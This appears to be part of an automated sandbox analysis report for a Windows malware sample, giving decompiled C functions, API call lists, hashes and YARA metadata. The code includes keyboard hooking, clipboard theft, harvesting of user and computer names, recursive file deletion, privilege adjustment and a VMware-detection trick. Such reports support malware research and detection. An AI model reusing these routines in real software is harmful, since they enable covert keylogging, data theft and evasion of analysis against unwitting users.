                                          • Instruction ID: 772636e3ebd337da963efdda9584c1e6191fd0daf56e0bc3e27ada7e64864670
                                          • Opcode Fuzzy Hash: 8a003b9b96387b9a977b2827803bf9a6b624b48ad5c8bb1a43ea3030722d3ccf
                                          • Instruction Fuzzy Hash: 03118B76941244AFC750EBE5DA898EFB7F8BE04300750457BF543E2590DAB8EE84C729
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00415A30,00415940,00415268,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E), ref: 0040222E
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040223B
                                          • malloc.MSVCRT ref: 00402248
                                          • recv.WS2_32(00415A30,00000000,00000000,00000000), ref: 00402259
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040226D
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402277
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402280
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040228D
                                            • Part of subcall function 004022EA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,00415A30,00000000), ref: 004022FC
                                            • Part of subcall function 004022EA: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668), ref: 00402314
                                            • Part of subcall function 004022EA: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402323
                                            • Part of subcall function 004022EA: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040232D
                                            • Part of subcall function 004022EA: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 00402346
                                            • Part of subcall function 004022EA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040234F
                                            • Part of subcall function 004022EA: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415A60), ref: 0040236E
                                            • Part of subcall function 004022EA: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040238E
                                            • Part of subcall function 004022EA: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668), ref: 004023A6
                                            • Part of subcall function 004022EA: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004023B8
                                            • Part of subcall function 004022EA: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,73115DF0), ref: 004023CE
                                            • Part of subcall function 004022EA: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023D8
                                            • Part of subcall function 004022EA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023E1
                                            • Part of subcall function 004022EA: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,?), ref: 004023F2
                                            • Part of subcall function 004022EA: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023FC
                                            • Part of subcall function 004022EA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402405
                                            • Part of subcall function 004022EA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402419
                                          • free.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022AE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D0
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D9
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??1?$basic_string@V01@$??0?$basic_string@??4?$basic_string@$D@1@@$??9std@@?substr@?$basic_string@D@2@@0@V12@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?length@?$basic_string@?size@?$basic_string@Y?$basic_string@freemallocrecv
                                          • String ID:
                                          • API String ID: 2200674315-0
                                          • Opcode ID: a6d19df7b26a596a4de367439ba62f5d2f94adbaaf081c4d5c5af70b61a6c544
                                          • Instruction ID: efd5f749c13a253eb37fde81f2b1e2490532d806b03320675b530293b808823e
                                          • Opcode Fuzzy Hash: a6d19df7b26a596a4de367439ba62f5d2f94adbaaf081c4d5c5af70b61a6c544
                                          • Instruction Fuzzy Hash: B8211D3250050AAFCB11DBA0DE4DAEEB779FF54309F10407AF406A2190DBB59E49CB28
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 84%
                                          			E0040F234(CHAR* _a4) {
                                          				signed char _v5;
                                          				void* _v12;
                                          				char _v272;
                                          				void _v532;
                                          				struct _WIN32_FIND_DATAA _v852;
                                          				CHAR* _t57;
                                          				void* _t58;
                                          				signed int _t86;
                                          				signed int _t87;
                                          				unsigned int _t89;
                                          				signed int _t90;
                                          				signed int _t96;
                                          				signed int _t99;
                                          				unsigned int _t105;
                                          				signed int _t106;
                                          				signed int _t112;
                                          				signed int _t115;
                                          				unsigned int _t121;
                                          				signed int _t122;
                                          				signed int _t129;
                                          				signed int _t132;
                                          				unsigned int _t138;
                                          				signed int _t139;
                                          				signed int _t147;
                                          				signed int _t150;
                                          				signed int _t153;
                                          				void* _t207;
                                          				void* _t208;
                                          				void* _t209;
                                          				void* _t210;
                                          				void* _t211;
                                          				void* _t212;
                                          				void* _t213;
                                          				void* _t214;
                                          				void* _t222;
                                          				void* _t224;
                                          				void* _t226;
                                          
                                          				_t87 = _t86 | 0xffffffff;
                                          				asm("repne scasb");
                                          				_t89 =  !_t87;
                                          				_t207 = _a4 - _t89;
                                          				_t90 = _t89 >> 2;
                                          				memcpy(_t207 + _t90 + _t90, _t207, memcpy( &_v532, _t207, _t90 << 2) & 0x00000003);
                                          				asm("repne scasb");
                                          				_t96 =  !_t87;
                                          				_t208 = "\\*" - _t96;
                                          				_t147 = _t96;
                                          				asm("repne scasb");
                                          				_t99 = _t147 >> 2;
                                          				memcpy( &_v532 - 1, _t208, _t99 << 2);
                                          				memcpy(_t208 + _t99 + _t99, _t208, _t147 & 0x00000003);
                                          				asm("repne scasb");
                                          				_t105 =  !_t87;
                                          				_t209 = _a4 - _t105;
                                          				_t106 = _t105 >> 2;
                                          				memcpy(_t209 + _t106 + _t106, _t209, memcpy( &_v272, _t209, _t106 << 2) & 0x00000003);
                                          				asm("repne scasb");
                                          				_t112 =  !_t87;
                                          				_t210 = 0x4108cc - _t112;
                                          				_t150 = _t112;
                                          				asm("repne scasb");
                                          				_t115 = _t150 >> 2;
                                          				memcpy( &_v272 - 1, _t210, _t115 << 2);
                                          				_t57 = memcpy(_t210 + _t115 + _t115, _t210, _t150 & 0x00000003);
                                          				_t222 = _t214 + 0x60;
                                          				_t58 = FindFirstFileA(_t57,  &_v852);
                                          				_v12 = _t58;
                                          				if(_t58 == _t87) {
                                          					L18:
                                          					return 0;
                                          				}
                                          				asm("repne scasb");
                                          				_t121 =  !_t87;
                                          				_v5 = 1;
                                          				_t211 =  &_v272 - _t121;
                                          				_t122 = _t121 >> 2;
                                          				memcpy(_t211 + _t122 + _t122, _t211, memcpy( &_v532, _t211, _t122 << 2) & 0x00000003);
                                          				_t224 = _t222 + 0x18;
                                          				do {
                                          					if(FindNextFileA(_v12,  &_v852) == 0) {
                                          						if(GetLastError() != 0x12) {
                                          							L17:
                                          							FindClose(_v12);
                                          							goto L18;
                                          						}
                                          						_v5 = _v5 & 0x00000000;
                                          						goto L14;
                                          					}
                                          					if(E0040F1C0( &(_v852.cFileName)) != 0) {
                                          						goto L14;
                                          					}
                                          					asm("repne scasb");
                                          					_t129 =  !_t87;
                                          					_t212 =  &(_v852.cFileName) - _t129;
                                          					_t153 = _t129;
                                          					asm("repne scasb");
                                          					_t132 = _t153 >> 2;
                                          					memcpy( &_v272 - 1, _t212, _t132 << 2);
                                          					memcpy(_t212 + _t132 + _t132, _t212, _t153 & 0x00000003);
                                          					_t226 = _t224 + 0x18;
                                          					if((_v852.dwFileAttributes & 0x00000010) == 0) {
                                          						if((_v852.dwFileAttributes & 0x00000001) != 0) {
                                          							SetFileAttributesA( &_v272, 0x80);
                                          						}
                                          						if(DeleteFileA( &_v272) == 0) {
                                          							goto L17;
                                          						} else {
                                          							L7:
                                          							asm("repne scasb");
                                          							_t138 =  !_t87;
                                          							_t213 =  &_v532 - _t138;
                                          							_t139 = _t138 >> 2;
                                          							memcpy(_t213 + _t139 + _t139, _t213, memcpy( &_v272, _t213, _t139 << 2) & 0x00000003);
                                          							_t224 = _t226 + 0x18;
                                          							goto L14;
                                          						}
                                          					}
                                          					if(E0040F234( &_v272) == 0) {
                                          						goto L17;
                                          					}
                                          					RemoveDirectoryA( &_v272);
                                          					goto L7;
                                          					L14:
                                          				} while (_v5 != 0);
                                          				FindClose(_v12);
                                          				return RemoveDirectoryA(_a4);
                                          			}

                                          APIs
                                          • FindFirstFileA.KERNEL32(?,?,00415918,00410668,74B5FBA0), ref: 0040F2F5
                                          • FindNextFileA.KERNEL32(0040E4BC,?), ref: 0040F33C
                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 0040F3F6
                                          • DeleteFileA.KERNEL32(?), ref: 0040F403
                                            • Part of subcall function 0040F234: RemoveDirectoryA.KERNEL32(?), ref: 0040F3B1
                                          • GetLastError.KERNEL32 ref: 0040F40F
                                          • FindClose.KERNEL32(0040E4BC), ref: 0040F42B
                                          • RemoveDirectoryA.KERNEL32(0040E4BC), ref: 0040F434
                                          • FindClose.KERNEL32(0040E4BC), ref: 0040F442
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                          • String ID:
                                          • API String ID: 2341273852-0
                                          • Opcode ID: bda2e7eeef083443b7bd4fac117ae406248ac067903fb5d96853e11b5ddda6fa
                                          • Instruction ID: c9d715fef9de8b24144a52c82442ab3d42063f8e50258a23890eccb11d7ae604
                                          • Opcode Fuzzy Hash: bda2e7eeef083443b7bd4fac117ae406248ac067903fb5d96853e11b5ddda6fa
                                          • Instruction Fuzzy Hash: 5151B636A0050C4BCF28CA749C446EEB7A6BBD4310F5485B9E806E76D0DEB99E8D8A44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 28%
                                          			E0040E549(intOrPtr _a4) {
                                          				char _v5;
                                          				char _v12;
                                          				long _v16;
                                          				char _v32;
                                          				void* _v48;
                                          				char _v80;
                                          				short _v592;
                                          				char* _t23;
                                          				char* _t25;
                                          
                                          				_v12 = 0x10;
                                          				 *0x415b98(1,  &_v80,  &_v12);
                                          				_v16 = 0x100;
                                          				GetUserNameW( &_v592,  &_v16);
                                          				_t23 =  &_v5;
                                          				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z("/", _t23,  &_v592);
                                          				_t25 =  &_v32;
                                          				L0040FC50();
                                          				L0040FC3E();
                                          				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_a4, _t25, _t25,  &_v80, _t23);
                                          				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          				return _a4;
                                          			}

                                          APIs
                                          • GetComputerNameExW.KERNEL32(00000001,?,00407C11), ref: 0040E563
                                          • GetUserNameW.ADVAPI32(?,?), ref: 0040E57B
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00411848,?,?), ref: 0040E594
                                          • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040E5A3
                                          • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(00000010,00000000), ref: 0040E5AF
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E5BA
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E5C3
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@G@2@@0@Hstd@@NameV?$basic_string@$??0?$basic_string@ComputerG@1@@UserV10@V10@@
                                          • String ID:
                                          • API String ID: 1350679479-0
                                          • Opcode ID: 98fc6973e258bf046ee6ab017d8c874cfade209d0468d1f87d8a2fe65baca8c3
                                          • Instruction ID: f1d4da816d663859cec578e5c7d94290c2f1c89324f161e9baf60459a55de7f2
                                          • Opcode Fuzzy Hash: 98fc6973e258bf046ee6ab017d8c874cfade209d0468d1f87d8a2fe65baca8c3
                                          • Instruction Fuzzy Hash: 90018CB5C0110DABDB11DB94EC49EDE7B7CEB08304F108176F915E2191EB74A68DCBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 84%
                                          			E0040CA41() {
                                          				void* _v8;
                                          				intOrPtr _v12;
                                          				struct _TOKEN_PRIVILEGES _v24;
                                          				signed int _t14;
                                          
                                          				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
                                          				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                          				_v24.PrivilegeCount = 1;
                                          				_v12 = 2;
                                          				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                                          				_t14 = GetLastError();
                                          				asm("sbb eax, eax");
                                          				return  ~( ~_t14);
                                          			}

                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000028,?,00415268), ref: 0040CA4E
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 0040CA55
                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040CA67
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040CA86
                                          • GetLastError.KERNEL32 ref: 0040CA8C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                          • String ID: SeShutdownPrivilege
                                          • API String ID: 3534403312-3733053543
                                          • Opcode ID: 48c1e8d5093e11796e88808fd98121dfa36cb171cdc9d53d0fc18bf8e136cc78
                                          • Instruction ID: b55852355777b42c5cafdc737e44021a98442e900811cd24b975246bc46e5c25
                                          • Opcode Fuzzy Hash: 48c1e8d5093e11796e88808fd98121dfa36cb171cdc9d53d0fc18bf8e136cc78
                                          • Instruction Fuzzy Hash: 6DF05871801129BBDB00ABA1ED0DEEF7EBCEF09358F104020B506E2090C6B45A88CBB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00408150(void** _a4) {
                                          				void* _t4;
                                          				long _t5;
                                          				struct HRSRC__* _t7;
                                          
                                          				_t7 = FindResourceA(0, "SETTINGS", 0xa);
                                          				_t4 = LockResource(LoadResource(0, _t7));
                                          				_t5 = SizeofResource(0, _t7);
                                          				 *_a4 = _t4;
                                          				return _t5;
                                          			}

                                          APIs
                                          • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 0040815E
                                          • LoadResource.KERNEL32(00000000,00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 00408169
                                          • LockResource.KERNEL32(00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 00408170
                                          • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 0040817B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Resource$FindLoadLockSizeof
                                          • String ID: SETTINGS
                                          • API String ID: 3473537107-594951305
                                          • Opcode ID: 4a4f9f9fedebf4e8c05053aceb2eda3fc10e4a3aaeaffec35722cfdb0d535c0a
                                          • Instruction ID: 01db6dd320cb8d17c195901b687e59d16bc98a51b3a2c1f815eadbb7ce5068f8
                                          • Opcode Fuzzy Hash: 4a4f9f9fedebf4e8c05053aceb2eda3fc10e4a3aaeaffec35722cfdb0d535c0a
                                          • Instruction Fuzzy Hash: C9E0BF35680314BBD6201BA5BC0DF977E68EB8AB62F004025F70DC6190DAB1444087A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 27%
                                          			E004050FC(void* __ecx, intOrPtr _a4) {
                                          				char _v5;
                                          				void* _t15;
                                          
                                          				if(OpenClipboard(0) == 0) {
                                          					L3:
                                          					_push( &_v5);
                                          					_push(0x410668);
                                          				} else {
                                          					_t15 = GetClipboardData(1);
                                          					CloseClipboard();
                                          					if(_t15 == 0) {
                                          						goto L3;
                                          					} else {
                                          						_push( &_v5);
                                          						_push(_t15);
                                          					}
                                          				}
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                          				return _a4;
                                          			}

                                          APIs
                                          • OpenClipboard.USER32(00000000), ref: 00405103
                                          • GetClipboardData.USER32 ref: 0040510F
                                          • CloseClipboard.USER32(?,00405184,?,?,00000000,74B06490,?,?,?,?,?,00404196), ref: 00405117
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?,?,00405184,?,?,00000000,74B06490,?,?,?,?,?,00404196), ref: 00405134
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Clipboard$V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@DataOpenU?$char_traits@
                                          • String ID:
                                          • API String ID: 1727351239-0
                                          • Opcode ID: 53859871c346f8d909a8a4067bc2c69c3a6e0e0f248ca5fb0bf1a49c13e3f3f4
                                          • Instruction ID: 906847f47c7b4b11390f21f1ccf552f120e036e9c6eec0ef59ca3d1b5a3ea75f
                                          • Opcode Fuzzy Hash: 53859871c346f8d909a8a4067bc2c69c3a6e0e0f248ca5fb0bf1a49c13e3f3f4
                                          • Instruction Fuzzy Hash: E6E06D75A41218BFD7409B50DC49FEFBBACEB48B41F008132BD05EA280D7B49981CAA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E0040818A(void* __ecx, char _a4) {
                                          				char _v5;
                                          				char _v8;
                                          
                                          				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3);
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8,  &_v5, __ecx);
                                          				_t5 =  &_a4; // 0x415268
                                          				return  *_t5;
                                          			}

                                          APIs
                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,0040A1F9,?,00415268,00415968,00415268,00415B08,00415268,00000000,00415268,1.7 Pro), ref: 0040819B
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,?,0040A1F9,?,00415268,00415968,00415268,00415B08,00415268,00000000,00415268,1.7 Pro,00415268,?), ref: 004081AC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@InfoLocaleU?$char_traits@
                                          • String ID: hRA
                                          • API String ID: 4090406865-819137882
                                          • Opcode ID: e3e50d6bbcdab5c93a1ca4425c6ccadb35c0c4967b2e4fa0870170a0cdf04c02
                                          • Instruction ID: 1a47b6e8894e7d79e7ab4b57d9db25869eba35aadfc9e332033dbe3f11390d94
                                          • Opcode Fuzzy Hash: e3e50d6bbcdab5c93a1ca4425c6ccadb35c0c4967b2e4fa0870170a0cdf04c02
                                          • Instruction Fuzzy Hash: 2EE0127560020DFBDB40CB90DC45FCE77BCEB08749F004051BA06D7190D6B0EB488B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004038DB(struct HHOOK__** _a4, int _a8, int _a12, void* _a16) {
                                          				void* _t19;
                                          				void* _t26;
                                          				struct HHOOK__** _t32;
                                          				signed int _t33;
                                          
                                          				_t32 = _a4;
                                          				_t33 = 5;
                                          				memcpy( &(_t32[0xf]), _a16, _t33 << 2);
                                          				if(_a8 == 0) {
                                          					_t19 = _a12 - 0x100;
                                          					if(_t19 == 0) {
                                          						if(GetKeyState(0x14) == 0 || GetKeyState(0x14) == 0xff80) {
                                          							_t32[0xb] = _t32[0xb] & 0x00000000;
                                          						} else {
                                          							_t32[0xb] = 1;
                                          						}
                                          						E004050B4(_t32);
                                          						E004050D8(_t32);
                                          						E004043BF(_t32);
                                          						if(_t32[0xb] == 0) {
                                          							E00404E5F(_t32);
                                          						}
                                          						_t32[0xb] = _t32[0xb] & 0x00000000;
                                          					} else {
                                          						_t26 = _t19 - 1;
                                          						if(_t26 == 0) {
                                          							E004050C6(_t32);
                                          							E004050EA(_t32);
                                          							E0040506E(_t32);
                                          						} else {
                                          							if(_t26 == 3) {
                                          								E00404FDE(_t32);
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return CallNextHookEx( *_t32, _a8, _a12, _a16);
                                          			}







                                          Instruction addresses: 0x004038e3 0x004038f0 0x004038f1 0x004038f3 0x004038f8 0x004038fd 0x00403934 0x00403946 0x00403940 0x00403940 0x00403940 0x0040394c 0x00403953 0x0040395a 0x00403963 0x00403967 0x00403967 0x0040396c 0x004038ff 0x004038ff 0x00403900 0x00403912 0x00403919 0x00403920 0x00403902 0x00403905 0x00403909 0x00403909 0x00403905 0x00403900 0x004038fd 0x00403985

                                          APIs
                                          • GetKeyState.USER32(00000014), ref: 0040392F
                                          • GetKeyState.USER32(00000014), ref: 00403938
                                            • Part of subcall function 00404FDE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410A64,?), ref: 0040505E
                                          • CallNextHookEx.USER32(?,00000000,?,?), ref: 0040397B
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: StateV?$allocator@$??0?$basic_string@CallD@1@@D@2@@std@@D@std@@HookNextU?$char_traits@
                                          • String ID:
                                          • API String ID: 98962008-0
                                          • Opcode ID: 2719df795b598792e02b9cd92bb9d782a1042e2cb6b283e7d445e30c5fd2cdbc
                                          • Instruction ID: 016176dd5e4550907043258ced9a7594ac35f6d0ba92dea6ea93643b686b713f
                                          • Opcode Fuzzy Hash: 2719df795b598792e02b9cd92bb9d782a1042e2cb6b283e7d445e30c5fd2cdbc
                                          • Instruction Fuzzy Hash: 6611DDB220020987DF00AF35CC80BAF3A199B48355F00403EAA423A2D3CABD8D149B9E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 46%
                                          			E00401102(void* __ecx) {
                                          				signed int _v8;
                                          				intOrPtr _v20;
                                          				intOrPtr _v28;
                                          				char _v32;
                                          				intOrPtr _t28;
                                          
                                          				_push(0xffffffff);
                                          				_push(0x410510);
                                          				_push(0x40fc60);
                                          				_push( *[fs:0x0]);
                                          				 *[fs:0x0] = _t28;
                                          				_v28 = _t28 - 0xc;
                                          				_v32 = 1;
                                          				_v8 = _v8 & 0x00000000;
                                          				_push(_t13);
                                          				asm("in eax, dx");
                                          				_v32 = 0 == 0x564d5868;
                                          				_v8 = _v8 | 0xffffffff;
                                          				 *[fs:0x0] = _v20;
                                          				return _v32;
                                          			}








                                          Instruction addresses: 0x00401105 0x00401107 0x0040110c 0x00401117 0x00401118 0x00401125 0x00401128 0x0040112c 0x00401132 0x00401147 0x0040114e 0x00401162 0x0040116c 0x00401177

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: hXMV$hXMV
                                          • API String ID: 0-400149659
                                          • Opcode ID: 32d6da195fab9a79b0a2790fc5938e76e7787eb2c00dcb82f7320fa8a259af23
                                          • Instruction ID: eaa8797a659175eabba1fc64c3000a1aeaf6329f201fbe84486763329dbd0212
                                          • Opcode Fuzzy Hash: 32d6da195fab9a79b0a2790fc5938e76e7787eb2c00dcb82f7320fa8a259af23
                                          • Instruction Fuzzy Hash: 67F0F672E08789ABD7048759DD92BAFFBB8E745B20F30463AF021636C1D27919018AA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040374A(void* __ecx) {
                                          				signed int _t3;
                                          				signed int _t4;
                                          				intOrPtr _t6;
                                          				intOrPtr _t7;
                                          				void* _t8;
                                          
                                          				_t8 = __ecx;
                                          				_t3 = GetKeyboardLayout(0);
                                          				_t4 = _t3 & 0x000003ff;
                                          				_t6 = 9;
                                          				if(_t4 == _t6) {
                                          					L3:
                                          					 *((intOrPtr*)(_t8 + 0x34)) = _t6;
                                          					return _t4;
                                          				} else {
                                          					_t7 = 0x10;
                                          					if(_t4 != _t7) {
                                          						goto L3;
                                          					} else {
                                          						 *((intOrPtr*)(_t8 + 0x34)) = _t7;
                                          						return _t4;
                                          					}
                                          				}
                                          			}








                                          Instruction addresses: 0x0040374b 0x0040374f 0x00403757 0x0040375c 0x00403760 0x0040376f 0x0040376f 0x00403773 0x00403762 0x00403764 0x00403768 0x00000000 0x0040376a 0x0040376a 0x0040376e 0x0040376e 0x00403768

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: KeyboardLayout
                                          • String ID:
                                          • API String ID: 194098044-0
                                          • Opcode ID: 7a138c4a33ac2ea2e17b4cf10e9ffc2fbbddba362a0710cd35810d1b16c1cc02
                                          • Instruction ID: 2df3cf34392ab381e4f069577e8eaff7fdb13a446b1c8ff3861ab48797279b8b
                                          • Opcode Fuzzy Hash: 7a138c4a33ac2ea2e17b4cf10e9ffc2fbbddba362a0710cd35810d1b16c1cc02
                                          • Instruction Fuzzy Hash: 59D0A7B794A3200EF6A4BB6CBA427E13784EB50B21F85903FE5801BAC8D4E469C20658
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004011A3(void* __ecx) {
                                          				intOrPtr _v8;
                                          
                                          				if( *[ds:eax] == 0x70) {
                                          					_v8 = 1;
                                          				} else {
                                          					_v8 = 0;
                                          				}
                                          				return 0 | _v8 != 0x00000000;
                                          			}




                                          Instruction addresses: 0x004011b6 0x004011c1 0x004011b8 0x004011b8 0x004011b8 0x004011d1

                                          Memory Dump Source
